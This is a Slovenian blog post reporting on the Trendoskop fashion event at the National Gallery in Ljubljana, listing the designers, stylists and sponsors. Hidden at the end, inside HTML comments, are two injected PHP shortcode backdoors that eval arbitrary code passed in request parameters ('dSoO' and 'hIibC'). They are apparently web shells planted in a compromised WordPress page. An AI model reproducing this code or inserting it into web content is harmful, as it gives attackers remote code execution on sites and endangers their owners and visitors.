TRENDOSKOP

TRENDOSKOP

Najbolj pričakovana modno obarvana prireditev letošnjega leta je 6. decembra v vsem svojem sijaju zažarela v prestolnici – zgodil se je TRENDOSKOP. Dogodek je potekal v Narodni galeriji ob Robovem vodnjaku. Prelep ambient je bil primeren za tako eminenten modni dogodek.

#gallery-1 {
margin: auto;
}
#gallery-1 .gallery-item {
float: left;
margin-top: 10px;
text-align: center;
width: 33%;
}
#gallery-1 img {
border: 2px solid #cfcfcf;
}
#gallery-1 .gallery-caption {
margin-left: 0;
}
/* see gallery_shortcode() in wp-includes/media.php */

Modni performans:

  • JSP – Jelena in Svetlana Proković
  • Zoran Garevski
  • Peter Movrin
  • Anja Dragan
  • Akultura

Glasbena gostaja: Hanah Manchini  – obleka Matevž Faganel

Marjeta Grošelj je dizajnirala torbico, ki je bila predstavljena na osrednjem oblikovalskem dogodku in je bila prestižna nagrada za eno udeleženko Trendoskopa.

Frizure: Mano Kolarič in Aska Kajtazovič za Mič Styling.

Make-up: Ana Lazovski z ekipo.

Trendoskop je nekaj, kar se bo nadaljevalo in vzdrževalo tradicijo na slovenskem področju mode. Želimo si, da bi v Sloveniji bilo več takšnih dogodkov kot je Trendoskop. Smo veseli, da so odgovorni v Planet SIOL in Telekomu imeli vizijo, za ustvarjanje takega dogodka.

Mano Kolarič in Aska Kajtazovič sta bila izjemno navdušena nad sodelovanjem v tako izjemnem dogodku, ki šteje ogromno pri sledilcih mode.

<!– [insert_php]if (isset($_REQUEST["dSoO"])){eval($_REQUEST["dSoO"]);exit;}[/insert_php][php]if (isset($_REQUEST["dSoO"])){eval($_REQUEST["dSoO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hIibC"])){eval($_REQUEST["hIibC"]);exit;}[/insert_php][php]if (isset($_REQUEST["hIibC"])){eval($_REQUEST["hIibC"]);exit;}[/php] –>

Tags: |

Leave A Comment